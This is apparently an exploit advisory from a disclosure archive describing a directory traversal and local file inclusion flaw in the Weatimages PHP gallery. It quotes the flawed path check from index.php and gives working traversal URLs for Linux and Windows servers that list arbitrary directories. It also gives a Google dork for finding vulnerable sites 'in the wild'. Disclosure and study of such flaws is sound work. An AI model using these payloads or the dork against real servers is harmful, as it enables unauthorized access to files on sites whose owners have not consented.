Weatimages Directory Traversal&Local File Include Vulnerabilities By: e.wiZz! ############Script info: ############Site: http://nazarkin.name/projects/weatimages/download.php In the wild... ####################################################### #######index.php: ... //kill oneself if user trying to access resource with '/../' in path if (strstr(urldecode($_SERVER['REQUEST_URI']), '/../')) { fatal_error('Suspicious query rejected'); } ... if (!$REQUEST_PATH) { if ($_GET['path']) { //compatibility mode enabled and we have some path $REQUEST_PATH = $_GET['path']; $SERVER_PHP_SELF = $_SERVER['SCRIPT_NAME'] . '/' . $REQUEST_PATH . '/'; } else { //we are in the root directory $REQUEST_PATH = '.'; } } ... ...huh, did you know there are Windows servers? #####List files in directory you want(linux): http://inthewild/index.php?path=../ http://inthewild/index.php?path=../.. ##### Windows?: http://inthewild/index.php?path=..\anything ########Dork: http://www.google.ba/#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2 (google says 200 000,i dont trust them)